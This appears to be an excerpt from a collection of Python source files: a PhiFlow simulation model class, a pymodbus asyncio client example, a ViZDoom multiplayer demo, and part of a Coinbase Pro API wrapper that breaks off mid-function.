| source | python |
|---|---|
model.py
|
# coding=utf-8
from __future__ import print_function
import logging, os, numbers, six, numpy, threading, inspect, time
from os.path import isfile
import phi.fluidformat, phi.math.nd
from phi.viz.plot import PlotlyFigureBuilder
def synchronized_method(method):
outer_lock = threading.Lock()
lock_name = "__" + method.__name__ + "_lock" + "__"
def sync_method(self, *args, **kws):
with outer_lock:
if not hasattr(self, lock_name): setattr(self, lock_name, threading.Lock())
lock = getattr(self, lock_name)
with lock:
return method(self, *args, **kws)
return sync_method
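# Minimal sketch (not part of this module): synchronized_method creates one lock
# per instance on first call, so concurrent calls on the same object are serialized
# while calls on different objects do not block each other.
#
# class Counter(object):
#     def __init__(self):
#         self.n = 0
#     @synchronized_method
#     def increment(self):
#         self.n += 1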
class TimeDependentField(object):
def __init__(self, name, generator):
self.name = name
self.generator = generator
self.array = None
self.invalidation_version = -1
@synchronized_method
def get(self, invalidation_version):
if invalidation_version != self.invalidation_version:
self.array = self.generator()
self.invalidation_version = invalidation_version
return self.array
class FieldSequenceModel(object):
def __init__(self,
name="Φ-*flow* Application",
subtitle="Interactive demo based on PhiFlow",
fields=None,
stride=1,
record_images=False, record_data=False,
base_dir=os.path.expanduser(os.path.join("~", "model")),
recorded_fields=None,
summary=None,
custom_properties=None,
target_scene=None,
objects_to_save=None):
self.name = name
self.subtitle = subtitle
self.summary = summary if summary else name
if fields:
self.fields = {name: TimeDependentField(name, generator) for (name,generator) in fields.items()}
else:
self.fields = {}
self.message = None
self.time = 0
self._invalidation_counter = 0
self.print_to_console = True
self._controls = []
self._actions = []
self._traits = []
self.prepared = False
self.current_action = None
self._pause = False
# Setup directory & Logging
self.objects_to_save = [ self.__class__ ] if objects_to_save is None else list(objects_to_save)
self.base_dir = os.path.expanduser(base_dir)
if not target_scene:
self.new_scene()
self.uses_existing_scene = False
else:
self.scene = target_scene
self.uses_existing_scene = True
if not isfile(self.scene.subpath("info.log")):
logfile = self.scene.subpath("info.log")
else:
index = 2
while True:
logfile = self.scene.subpath("info_%d.log"%index)
if not isfile(logfile): break
else: index += 1
logging.basicConfig(filename=logfile, level=logging.INFO, format="%(message)s (%(levelname)s), %(asctime)s\n")
print("Scene directory is %s" % self.scene.path)
# Recording
self.record_images = record_images
self.record_data = record_data
self.recorded_fields = recorded_fields if recorded_fields is not None else []
self.rec_all_slices = False
self.sequence_stride = stride
self._custom_properties = custom_properties if custom_properties else {}
self.figures = PlotlyFigureBuilder()
self._simulation = None
self.info("Setting up model...")
def new_scene(self):
self.scene = phi.fluidformat.new_scene(self.base_dir, self.scene_summary(), mkdir=True)
@property
def sim(self):
return self._simulation
@sim.setter
def sim(self, sim):
self._simulation = sim
def set_simulation(self, sim):
self.sim = sim
@property
def directory(self):
return self.scene.path
@property
def image_dir(self):
return self.scene.subpath("images")
def get_image_dir(self):
return self.scene.subpath("images", create=True)
def progress(self):
self.time += 1
self.step()
self.invalidate()
def invalidate(self):
self._invalidation_counter += 1
def step(self):
self.info("Implement step(self) to have something happen")
@property
def fieldnames(self):
return sorted(self.fields.keys())
def get_field(self, fieldname):
if not fieldname in self.fields:
raise KeyError("Field %s not declared. Available fields are %s" % (fieldname, self.fields.keys()))
return self.fields[fieldname].get(self._invalidation_counter)
def add_field(self, name, generator):
assert not self.prepared, "Cannot add fields to a prepared model"
self.fields[name] = TimeDependentField(name, generator)
@property
def actions(self):
return self._actions
def add_action(self, name, methodcall):
self._actions.append(Action(name, methodcall, name))
def run_action(self, action):
message_before = self.message
action.method()
self.invalidate()
message_after = self.message
if message_before == message_after:
if self.message is None or self.message == "":
self.message = display_name(action.name)
else:
self.message += " | " + display_name(action.name)
@property
def traits(self):
return self._traits
def add_trait(self, trait):
assert not self.prepared, "Cannot add traits to a prepared model"
self._traits.append(trait)
@property
def controls(self):
return self._controls
def prepare(self):
if self.prepared:
return
logging.info("Gathering model data...")
self.prepared = True
# Controls
for name in dir(self):
val = getattr(self, name)
editable_value = None
if isinstance(val, EditableValue):
editable_value = val
setattr(self, name, val.initial_value) # Replace EditableValue with initial value
elif name.startswith("value_"):
value_name = display_name(name[6:])
dtype = type(val)
if dtype == bool:
editable_value = EditableBool(value_name, val)
elif isinstance(val, numbers.Integral): # Int
editable_value = EditableInt(value_name, val)
elif isinstance(val, numbers.Number): # Float
editable_value = EditableFloat(value_name, val)
elif isinstance(val, six.string_types):
editable_value = EditableString(value_name, val)
if editable_value:
self._controls.append(Control(self, name, editable_value))
# Actions
for method_name in dir(self):
if method_name.startswith("action_") and callable(getattr(self, method_name)):
self._actions.append(Action(display_name(method_name[7:]), getattr(self, method_name), method_name))
# Scene
self._update_scene_properties()
source_files_to_save = set()
for object in self.objects_to_save:
source_files_to_save.add(inspect.getabsfile(object))
for source_file in source_files_to_save:
self.scene.copy_src(source_file)
def add_custom_property(self, key, value):
self._custom_properties[key] = value
if self.prepared: self._update_scene_properties()
def add_custom_properties(self, dict):
self._custom_properties.update(dict)
if self.prepared: self._update_scene_properties()
def _update_scene_properties(self):
if self.uses_existing_scene: return
app_name = inspect.getfile(self.__class__)
app_path = inspect.getabsfile(self.__class__)
properties = {
"instigator": "FieldSequenceModel",
"traits": self.traits,
"app": str(app_name),
"app_path": str(app_path),
"name": self.name,
"description": self.subtitle,
"all_fields": self.fieldnames,
"actions": [action.name for action in self.actions],
"controls": [{control.name: control.value} for control in self.controls],
"summary": self.scene_summary(),
"time_of_writing": self.time,
}
if self._simulation:
properties.update(self._simulation.as_dict())
properties.update(self.custom_properties())
self.scene.properties = properties
def settings_str(self):
return "".join([
" " + str(control) for control in self.controls
])
def custom_properties(self):
return self._custom_properties
def info(self, message):
if isinstance(message, int):
self.time = message
else:
self.message = message
if self.print_to_console:
print(str(self.time)+": "+message)
logging.info(message)
def debug(self, message):
logging.info(message)
def scene_summary(self):
return self.summary
def list_controls(self, names):
return
def show(self, *args, **kwargs):
from phi.viz.dash_gui import DashFieldSequenceGui
gui = DashFieldSequenceGui(self, *args, **kwargs)
return gui.show()
@property
def status(self):
pausing = "/Pausing" if self._pause and self.current_action else ""
action = self.current_action if self.current_action else "Idle"
message = (" - %s"%self.message) if self.message else ""
return "{}{} ({}){}".format(action, pausing, self.time, message)
def run_step(self, framerate=None, allow_recording=True):
try:
self.current_action = "Running"
starttime = time.time()
self.progress()
if allow_recording and self.time % self.sequence_stride == 0:
self.record_frame()
if framerate is not None:
duration = time.time() - starttime
rest = 1.0/framerate/self.sequence_stride - duration
if rest > 0:
self.current_action = "Waiting"
time.sleep(rest)
finally:
self.current_action = None
def play(self, max_steps=None, callback=None, framerate=None, allow_recording=True):
def target():
self._pause = False
step_count = 0
while not self._pause:
self.run_step(framerate=framerate, allow_recording=allow_recording)
step_count += 1
if max_steps and step_count >= max_steps:
break
if callback is not None:
callback()
thread = threading.Thread(target=target)
thread.start()
return self
def pause(self):
self._pause = True
@property
def running(self):
return self.current_action is not None
def record_frame(self):
self.current_action = "Recording"
files = []
if self.record_images:
os.path.isdir(self.image_dir) or os.makedirs(self.image_dir)
arrays = [self.get_field(field) for field in self.recorded_fields]
for name, array in zip(self.recorded_fields, arrays):
files += self.figures.save_figures(self.image_dir, name, self.time, array)
if self.record_data:
arrays = [self.get_field(field) for field in self.recorded_fields]
arrays = [a.staggered if isinstance(a, phi.math.nd.StaggeredGrid) else a for a in arrays]
files += phi.fluidformat.write_sim_frame(self.directory, arrays, self.recorded_fields, self.time)
if files:
self.message = "Frame written to %s" % files
self.current_action = None
def benchmark(self, sequence_count):
self._pause = False
step_count = 0
starttime = time.time()
for i in range(sequence_count):
self.run_step(framerate=None, allow_recording=False)
step_count += 1
if self._pause: break
time_elapsed = time.time() - starttime
return step_count, time_elapsed
def config_recording(self, images, data, fields):
self.record_images = images
self.record_data = data
self.recorded_fields = fields
class EditableValue(object):
def __init__(self, name, type, initial_value, category, minmax, is_linear):
self.name = name
self.type = type
self.initial_value = initial_value
self.category = category
self.minmax = minmax
self.is_linear = is_linear
@property
def min_value(self):
return self.minmax[0]
@property
def max_value(self):
return self.minmax[1]
class EditableFloat(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None, log_scale=None):
if minmax is not None:
assert len(minmax) == 2, "minmax must be pair (min, max)"
if log_scale is None:
if minmax is None:
log_scale = True
else:
log_scale = minmax[1] / float(minmax[0]) > 10
if not minmax:
if log_scale:
magn = numpy.log10(initial_value)
minmax = (10.0**(magn-3.2), 10.0**(magn+2.2))
else:
if initial_value == 0.0:
minmax = (-10.0, 10.0)
elif initial_value > 0:
minmax = (0., 4. * initial_value)
else:
minmax = (2. * initial_value, -2. * initial_value)
else:
minmax = (float(minmax[0]), float(minmax[1]))
EditableValue.__init__(self, name, "float", initial_value, category, minmax, not log_scale)
@property
def use_log_scale(self):
return not self.is_linear
class EditableInt(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None):
if not minmax:
if initial_value == 0:
minmax = (-10, 10)
elif initial_value > 0:
minmax = (0, 4*initial_value)
else:
minmax = (2 * initial_value, -2 * initial_value)
EditableValue.__init__(self, name, "int", initial_value, category, minmax, True)
class EditableBool(EditableValue):
def __init__(self, name, initial_value, category=None):
EditableValue.__init__(self, name, "bool", initial_value, category, (False, True), True)
class EditableString(EditableValue):
def __init__(self, name, initial_value, category=None, rows=20):
EditableValue.__init__(self, name, "text", initial_value, category, ("", "A"*rows), True)
@property
def rows(self):
return len(self.max_value)
class Control(object):
def __init__(self, model, attribute_name, editable_value):
self.model = model
self.attribute_name = attribute_name
self.editable_value = editable_value
@property
def value(self):
val = getattr(self.model, self.attribute_name)
if isinstance(val, numpy.float32):
return float(val)
if isinstance(val, numpy.float64):
return float(val)
return val
@value.setter
def value(self, value):
setattr(self.model, self.attribute_name, value)
self.model.invalidate()
@property
def name(self):
return self.editable_value.name
@property
def type(self):
return self.editable_value.type
@property
def id(self):
return self.attribute_name
def __str__(self):
return self.name + "_" + str(self.value)
@property
def range(self):
return self.editable_value.minmax
class Action(object):
def __init__(self, name, method, id):
self.name = name
self.method = method
self.method_name = id
@property
def id(self):
return self.method_name
def display_name(python_name):
n = list(python_name)
n[0] = n[0].upper()
for i in range(1,len(n)):
if n[i] == "_":
n[i] = " "
if len(n) > i+1:
n[i+1] = n[i+1].upper()
return "".join(n)
|
async_asyncio_client.py
|
#!/usr/bin/env python3
"""
Pymodbus Asynchronous Client Examples
--------------------------------------------------------------------------
The following is an example of how to use the asynchronous modbus
client implementation from pymodbus with asyncio.
The example is only valid on Python3.4 and above
"""
import asyncio
import logging
# ----------------------------------------------------------------------- #
# Import the required asynchronous client
# ----------------------------------------------------------------------- #
from pymodbus.client.asynchronous.tcp import AsyncModbusTCPClient as ModbusClient
# from pymodbus.client.asynchronous.udp import (
# AsyncModbusUDPClient as ModbusClient)
from pymodbus.client.asynchronous import schedulers
from threading import Thread
import time
# --------------------------------------------------------------------------- #
# configure the client logging
# --------------------------------------------------------------------------- #
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# specify slave to query
# --------------------------------------------------------------------------- #
# The slave to query is specified in an optional parameter for each
# individual request. This can be done by specifying the `unit` parameter
# which defaults to `0x00`
# --------------------------------------------------------------------------- #
UNIT = 0x01
async def start_async_test(client):
# ----------------------------------------------------------------------- #
# specify slave to query
# ----------------------------------------------------------------------- #
# The slave to query is specified in an optional parameter for each
# individual request. This can be done by specifying the `unit` parameter
# which defaults to `0x00`
# ----------------------------------------------------------------------- #
log.debug("Reading Coils")
rr = await client.read_coils(1, 1, unit=0x01)
# ----------------------------------------------------------------------- #
# example requests
# ----------------------------------------------------------------------- #
# simply call the methods that you would like to use. An example session
# is displayed below along with some assert checks. Note that some modbus
# implementations differentiate holding/input discrete/coils and as such
# you will not be able to write to these, therefore the starting values
# are not known to these tests. Furthermore, some use the same memory
# blocks for the two sets, so a change to one is a change to the other.
# Keep both of these cases in mind when testing as the following will
# _only_ pass with the supplied asynchronous modbus server (script supplied).
# ----------------------------------------------------------------------- #
log.debug("Write to a Coil and read back")
rq = await client.write_coil(0, True, unit=UNIT)
rr = await client.read_coils(0, 1, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.bits[0] == True) # test the expected value
log.debug("Write to multiple coils and read back- test 1")
rq = await client.write_coils(1, [True]*8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
rr = await client.read_coils(1, 21, unit=UNIT)
assert(rr.function_code < 0x80) # test that we are not an error
resp = [True]*21
# If the returned output quantity is not a multiple of eight,
# the remaining bits in the final data byte will be padded with zeros
# (toward the high order end of the byte).
resp.extend([False]*3)
assert(rr.bits == resp) # test the expected value
log.debug("Write to multiple coils and read back - test 2")
rq = await client.write_coils(1, [False]*8, unit=UNIT)
rr = await client.read_coils(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.bits == [False]*8) # test the expected value
log.debug("Read discrete inputs")
rr = await client.read_discrete_inputs(0, 8, unit=UNIT)
assert(rr.function_code < 0x80)     # test that we are not an error
log.debug("Write to a holding register and read back")
rq = await client.write_register(1, 10, unit=UNIT)
rr = await client.read_holding_registers(1, 1, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.registers[0] == 10) # test the expected value
log.debug("Write to multiple holding registers and read back")
rq = await client.write_registers(1, [10]*8, unit=UNIT)
rr = await client.read_holding_registers(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rr.registers == [10]*8) # test the expected value
log.debug("Read input registers")
rr = await client.read_input_registers(1, 8, unit=UNIT)
assert(rr.function_code < 0x80)     # test that we are not an error
arguments = {
'read_address': 1,
'read_count': 8,
'write_address': 1,
'write_registers': [20]*8,
}
log.debug("Read write registeres simulataneously")
rq = await client.readwrite_registers(unit=UNIT, **arguments)
rr = await client.read_holding_registers(1, 8, unit=UNIT)
assert(rq.function_code < 0x80) # test that we are not an error
assert(rq.registers == [20]*8) # test the expected value
assert(rr.registers == [20]*8) # test the expected value
await asyncio.sleep(1)
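# Optional helper sketch (not part of the original example): Modbus exception
# responses set the high bit of the function code (>= 0x80), which is what the
# bare asserts above check; a named helper makes failures easier to read.
def assert_ok(response):
    assert response.function_code < 0x80, "request returned a Modbus exception"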
def run_with_not_running_loop():
"""
A loop is created and is passed to ModbusClient factory to be used.
:return:
"""
log.debug("Running Async client with asyncio loop not yet started")
log.debug("------------------------------------------------------")
loop = asyncio.new_event_loop()
assert not loop.is_running()
asyncio.set_event_loop(loop)
new_loop, client = ModbusClient(schedulers.ASYNC_IO, port=5020, loop=loop)
loop.run_until_complete(start_async_test(client.protocol))
loop.close()
log.debug("--------------RUN_WITH_NOT_RUNNING_LOOP---------------")
log.debug("")
def run_with_already_running_loop():
"""
An already running loop is passed to ModbusClient Factory
:return:
"""
log.debug("Running Async client with asyncio loop already started")
log.debug("------------------------------------------------------")
def done(future):
log.info("Done !!!")
def start_loop(loop):
"""
Start Loop
:param loop:
:return:
"""
asyncio.set_event_loop(loop)
loop.run_forever()
loop = asyncio.new_event_loop()
t = Thread(target=start_loop, args=[loop])
t.daemon = True
# Start the loop
t.start()
assert loop.is_running()
asyncio.set_event_loop(loop)
loop, client = ModbusClient(schedulers.ASYNC_IO, port=5020, loop=loop)
future = asyncio.run_coroutine_threadsafe(
start_async_test(client.protocol), loop=loop)
future.add_done_callback(done)
while not future.done():
time.sleep(0.1)
loop.stop()
log.debug("--------DONE RUN_WITH_ALREADY_RUNNING_LOOP-------------")
log.debug("")
def run_with_no_loop():
"""
ModbusClient Factory creates a loop.
:return:
"""
log.debug("---------------------RUN_WITH_NO_LOOP-----------------")
loop, client = ModbusClient(schedulers.ASYNC_IO, port=5020)
loop.run_until_complete(start_async_test(client.protocol))
loop.close()
log.debug("--------DONE RUN_WITH_NO_LOOP-------------")
log.debug("")
if __name__ == '__main__':
# Run with No loop
log.debug("Running Async client")
log.debug("------------------------------------------------------")
run_with_no_loop()
# Run with loop not yet started
# run_with_not_running_loop()
# Run with already running loop
# run_with_already_running_loop()
log.debug("")
|
multiple_instances_advance.py
|
#!/usr/bin/env python
from __future__ import print_function
from random import choice, random
from time import sleep
from vizdoom import *
# For a multiplayer game use processes (ZDoom's multiplayer sync mechanism prevents threads from working as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Config
episodes = 10
timelimit = 1 # min
players = 2 # number of players
skip = 1
mode = Mode.PLAYER
random_sleep = False
window = False
args =""
console = False
args = "+viz_debug 1 +viz_debug_instances 1"
console = True
#config = "../config/multi_duel.cfg"
config = "../config/cig.cfg"
def player_host(p):
game = DoomGame()
game.load_config(config)
game.add_game_args("-host " + str(p) + " -deathmatch +timelimit " + str(timelimit) + " +sv_spawnfarthest 1")
game.add_game_args("+name Player0 +colorset 0")
game.set_mode(mode)
game.add_game_args(args)
game.set_console_enabled(console)
game.set_window_visible(window)
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
action_count = 0
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
state = game.get_state()
game.make_action(choice(actions), skip)
action_count += 1
if random_sleep:
sleep(random()/10)
print("Player0:", state.number, action_count, game.get_episode_time())
print("Player0 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
print("Episode finished!")
# Print each player's frag count; PLAYERn_FRAGCOUNT corresponds to player index n - 1.
for i in range(p):
    frag_variable = getattr(GameVariable, "PLAYER" + str(i + 1) + "_FRAGCOUNT")
    print("Host: Player" + str(i) + " frags:", game.get_game_variable(frag_variable))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player_join(p):
game = DoomGame()
game.load_config(config)
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player" + str(p) + " +colorset " + str(p))
game.set_mode(mode)
game.add_game_args(args)
game.set_console_enabled(console)
game.set_window_visible(window)
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
action_count = 0
sleep_time = 0.01 * p
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
state = game.get_state()
game.make_action(choice(actions), skip)
action_count += 1
print("Player" + str(p) + ":", state.number, action_count, game.get_episode_time())
if random_sleep:
sleep(random()/10)
elif sleep_time > 0:
sleep(sleep_time)
print("Player" + str(p) + " frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
if __name__ == '__main__':
processes = []
# p_host = Process(target=player_host, args=(players,))
# p_host.start()
# processes.append(p_host)
for i in range(players - 1):
p_join = Process(target=player_join, args=(i + 1,))
p_join.start()
processes.append(p_join)
player_host(players)
print("Done")
|
api.py
|
"""Remotely control your Coinbase Pro account via their API"""
import re
import json
import hmac
import hashlib
import time
import requests
import base64
import sys
import pandas as pd
from numpy import floor
from datetime import datetime, timedelta
from requests.auth import AuthBase
from requests import Request
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from models.helper.LogHelper import Logger
from models.exchange.Granularity import Granularity
MARGIN_ADJUSTMENT = 0.0025
DEFAULT_MAKER_FEE_RATE = 0.005
DEFAULT_TAKER_FEE_RATE = 0.005
MINIMUM_TRADE_AMOUNT = 10
DEFAULT_GRANULARITY = 3600
SUPPORTED_GRANULARITY = [60, 300, 900, 3600, 21600, 86400]
FREQUENCY_EQUIVALENTS = ["T", "5T", "15T", "H", "6H", "D"]
MAX_GRANULARITY = max(SUPPORTED_GRANULARITY)
DEFAULT_MARKET = "BTC-GBP"
class AuthAPIBase:
def _isMarketValid(self, market: str) -> bool:
p = re.compile(r"^[1-9A-Z]{2,5}\-[1-9A-Z]{2,5}$")
if p.match(market):
return True
return False
# def to_coinbasepro_granularity(self, granularity) -> str:
# if isinstance(granularity, int):
# if granularity in SUPPORTED_GRANULARITY:
# return granularity
# else:
# raise ValueError(f"Invalid Binance granularity: {granularity}")
# else:
# return {"1min" : 60, "5min" : 300, "15min" : 900, "1hour" : 3600, "6hour" : 21600, "1day" : 86400} [
# granularity
# ]
class AuthAPI(AuthAPIBase):
def __init__(
self,
api_key="",
api_secret="",
api_passphrase="",
api_url="https://api.pro.coinbase.com",
) -> None:
"""Coinbase Pro API object model
Parameters
----------
api_key : str
Your Coinbase Pro account portfolio API key
api_secret : str
Your Coinbase Pro account portfolio API secret
api_passphrase : str
Your Coinbase Pro account portfolio API passphrase
api_url
Coinbase Pro API URL
"""
# options
self.debug = False
self.die_on_api_error = False
valid_urls = [
"https://api.pro.coinbase.com",
"https://api.pro.coinbase.com/",
"https://public.sandbox.pro.coinbase.com",
"https://public.sandbox.pro.coinbase.com/",
]
# validate Coinbase Pro API
if api_url not in valid_urls:
raise ValueError("Coinbase Pro API URL is invalid")
if api_url[-1] != "/":
api_url = api_url + "/"
# validates the api key is syntactically correct
p = re.compile(r"^[a-f0-9]{32}$")
if not p.match(api_key):
self.handle_init_error("Coinbase Pro API key is invalid")
# validates the api secret is syntactically correct
p = re.compile(r"^[A-z0-9+\/]+==$")
if not p.match(api_secret):
self.handle_init_error("Coinbase Pro API secret is invalid")
# validates the api passphrase is syntactically correct
p = re.compile(r"^[A-z0-9#$%=@!{},`~&*()<>?.:;_|^/+\[\]]{8,32}$")
if not p.match(api_passphrase):
self.handle_init_error("Coinbase Pro API passphrase is invalid")
self._api_key = api_key
self._api_secret = api_secret
self._api_passphrase = api_passphrase
self._api_url = api_url
def handle_init_error(self, err: str) -> None:
"""Handle initialisation error"""
if self.debug:
raise TypeError(err)
else:
raise SystemExit(err)
def __call__(self, request) -> Request:
"""Signs the request"""
timestamp = str(time.time())
body = (request.body or b"").decode()
message = f"{timestamp}{request.method}{request.path_url}{body}"
hmac_key = base64.b64decode(self._api_secret)
signature = hmac.new(hmac_key, message.encode(), hashlib.sha256)
signature_b64 = base64.b64encode(signature.digest()).decode()
request.headers.update(
{
"CB-ACCESS-SIGN": signature_b64,
"CB-ACCESS-TIMESTAMP": timestamp,
"CB-ACCESS-KEY": self._api_key,
"CB-ACCESS-PASSPHRASE": self._api_passphrase,
"Content-Type": "application/json",
}
)
return request
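# Illustration of the signature above (assumed values): the prehash string is
# timestamp + method + request path + body, e.g. "1614871200.123GET/accounts"
# for a GET with an empty body; it is signed with HMAC-SHA256 using the
# base64-decoded API secret and sent base64-encoded in the CB-ACCESS-SIGN header.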
def getAccounts(self) -> pd.DataFrame:
"""Retrieves your list of accounts"""
# GET /accounts
try:
df = self.authAPI("GET", "accounts")
except:
return pd.DataFrame()
if len(df) == 0:
return pd.DataFrame()
# exclude accounts with a nil balance
df = df[df.balance != "0.0000000000000000"]
# reset the dataframe index to start from 0
df = df.reset_index()
return df
def getAccount(self, account: str) -> pd.DataFrame:
"""Retrieves a specific account"""
# validates the account is syntactically correct
p = re.compile(r"^[a-f0-9\-]{36,36}$")
if not p.match(account):
self.handle_init_error("Coinbase Pro account is invalid")
try:
return self.authAPI("GET", f"accounts/{account}")
except:
return pd.DataFrame()
def getFees(self, market: str = "") -> pd.DataFrame:
"""Retrieves market fees"""
try:
df = self.authAPI("GET", "fees")
if len(df) == 0:
return pd.DataFrame()
if len(market):
df["market"] = market
else:
df["market"] = ""
return df
except:
return pd.DataFrame()
def getMakerFee(self, market: str = "") -> float:
"""Retrieves maker fee"""
if len(market):
fees = self.getFees(market)
else:
fees = self.getFees()
if len(fees) == 0 or "maker_fee_rate" not in fees:
Logger.error(
f"error: 'maker_fee_rate' not in fees (using {DEFAULT_MAKER_FEE_RATE} as a fallback)"
)
return DEFAULT_MAKER_FEE_RATE
return float(fees["maker_fee_rate"].to_string(index=False).strip())
def getTakerFee(self, market: str = "") -> float:
"""Retrieves taker fee"""
if len(market):
fees = self.getFees(market)
else:
fees = self.getFees()
if len(fees) == 0 or "taker_fee_rate" not in fees:
Logger.error(
f"error: 'taker_fee_rate' not in fees (using {DEFAULT_TAKER_FEE_RATE} as a fallback)"
)
return DEFAULT_TAKER_FEE_RATE
return float(fees["taker_fee_rate"].to_string(index=False).strip())
def getUSDVolume(self) -> float:
"""Retrieves USD volume"""
try:
fees = self.getFees()
if "usd_volume" in fees:
return float(fees["usd_volume"].to_string(index=False).strip())
else:
return 0
except:
return 0
def getOrders(
self, market: str = "", action: str = "", status: str = "all"
) -> pd.DataFrame:
"""Retrieves your list of orders with optional filtering"""
# if market provided
if market != "":
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
# if action provided
if action != "":
# validates action is either a buy or sell
if not action in ["buy", "sell"]:
raise ValueError("Invalid order action.")
# validates status is either open, pending, done, active, or all
if not status in ["open", "pending", "done", "active", "all"]:
raise ValueError("Invalid order status.")
try:
# GET /orders?status
resp = self.authAPI("GET", f"orders?status={status}")
if len(resp) > 0:
if status == "open":
df = resp.copy()[
[
"created_at",
"product_id",
"side",
"type",
"size",
"price",
"status",
]
]
df["value"] = float(df["price"]) * float(df["size"]) - (
float(df["price"]) * MARGIN_ADJUSTMENT
)
else:
if "specified_funds" in resp:
df = resp.copy()[
[
"created_at",
"product_id",
"side",
"type",
"filled_size",
"specified_funds",
"executed_value",
"fill_fees",
"status",
]
]
else:
# manual limit orders do not contain 'specified_funds'
df_tmp = resp.copy()
df_tmp["specified_funds"] = None
df = df_tmp[
[
"created_at",
"product_id",
"side",
"type",
"filled_size",
"specified_funds",
"executed_value",
"fill_fees",
"status",
]
]
else:
return pd.DataFrame()
# replace null NaN values with 0
df.fillna(0, inplace=True)
df_tmp = df.copy()
df_tmp["price"] = 0.0
df_tmp["filled_size"] = df_tmp["filled_size"].astype(float)
df_tmp["specified_funds"] = df_tmp["specified_funds"].astype(float)
df_tmp["executed_value"] = df_tmp["executed_value"].astype(float)
df_tmp["fill_fees"] = df_tmp["fill_fees"].astype(float)
df = df_tmp
# calculates the price at the time of purchase
if status != "open":
df["price"] = df.copy().apply(
lambda row: (float(row.executed_value) * 100)
/ (float(row.filled_size) * 100)
if float(row.filled_size) > 0
else 0,
axis=1,
)
# df.loc[df['filled_size'] > 0, 'price'] = (df['executed_value'] * 100) / (df['filled_size'] * 100)
# rename the columns
if status == "open":
df.columns = [
"created_at",
"market",
"action",
"type",
"size",
"price",
"status",
"value",
]
df = df[
[
"created_at",
"market",
"action",
"type",
"size",
"value",
"status",
"price",
]
]
df["size"] = df["size"].astype(float).round(8)
else:
df.columns = [
"created_at",
"market",
"action",
"type",
"value",
"size",
"filled",
"fees",
"status",
"price",
]
df = df[
[
"created_at",
"market",
"action",
"type",
"size",
"value",
"fees",
"price",
"status",
]
]
df.columns = [
"created_at",
"market",
"action",
"type",
"size",
"filled",
"fees",
"price",
"status",
]
df_tmp = df.copy()
df_tmp["filled"] = df_tmp["filled"].astype(float).round(8)
df_tmp["size"] = df_tmp["size"].astype(float).round(8)
df_tmp["fees"] = df_tmp["fees"].astype(float).round(8)
df_tmp["price"] = df_tmp["price"].astype(float).round(8)
df = df_tmp
# convert dataframe to a time series
tsidx = pd.DatetimeIndex(
pd.to_datetime(df["created_at"]).dt.strftime("%Y-%m-%dT%H:%M:%S.%Z")
)
df.set_index(tsidx, inplace=True)
df = df.drop(columns=["created_at"])
# if market provided
if market != "":
# filter by market
df = df[df["market"] == market]
# if action provided
if action != "":
# filter by action
df = df[df["action"] == action]
# if status provided
if status != "all":
# filter by status
df = df[df["status"] == status]
# reverse orders and reset index
df = df.iloc[::-1].reset_index()
# for sell orders size is filled
df["size"] = df["size"].fillna(df["filled"])
return df
except:
return pd.DataFrame()
def getTime(self) -> datetime:
"""Retrieves the exchange time"""
try:
resp = self.authAPI("GET", "time")
if "epoch" in resp:
epoch = int(resp["epoch"])
return datetime.fromtimestamp(epoch)
else:
Logger.error(resp)
return None
except Exception as e:
Logger.error(f"Error: {e}")
return None
def marketBuy(self, market: str = "", quote_quantity: float = 0) -> pd.DataFrame:
"""Executes a market buy providing a funding amount"""
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
# validates quote_quantity is either an integer or float
if not isinstance(quote_quantity, int) and not isinstance(
quote_quantity, float
):
Logger.critical(
"Please report this to Michael Whittle: "
+ str(quote_quantity)
+ " "
+ str(type(quote_quantity))
)
raise TypeError("The funding amount is not numeric.")
# funding amount needs to be greater than 10
if quote_quantity < MINIMUM_TRADE_AMOUNT:
Logger.warning(f"Trade amount is too small (>= {MINIMUM_TRADE_AMOUNT}).")
return pd.DataFrame()
# raise ValueError(f"Trade amount is too small (>= {MINIMUM_TRADE_AMOUNT}).")
try:
order = {
"product_id": market,
"type": "market",
"side": "buy",
"funds": self.marketQuoteIncrement(market, quote_quantity),
}
Logger.debug(order)
# connect to authenticated coinbase pro api
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
# place order and return result
return model.authAPI("POST", "orders", order)
except:
return pd.DataFrame()
def marketSell(self, market: str = "", base_quantity: float = 0) -> pd.DataFrame:
"""Executes a market sell providing a crypto amount"""
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
if not isinstance(base_quantity, int) and not isinstance(base_quantity, float):
raise TypeError("The crypto amount is not numeric.")
try:
order = {
"product_id": market,
"type": "market",
"side": "sell",
"size": self.marketBaseIncrement(market, base_quantity),
}
Logger.debug(order)
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
return model.authAPI("POST", "orders", order)
except:
return pd.DataFrame()
def limitSell(
self, market: str = "", base_quantity: float = 0, future_price: float = 0
) -> pd.DataFrame:
"""Initiates a limit sell order"""
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
if not isinstance(base_quantity, int) and not isinstance(base_quantity, float):
raise TypeError("The crypto amount is not numeric.")
if not isinstance(future_price, int) and not isinstance(future_price, float):
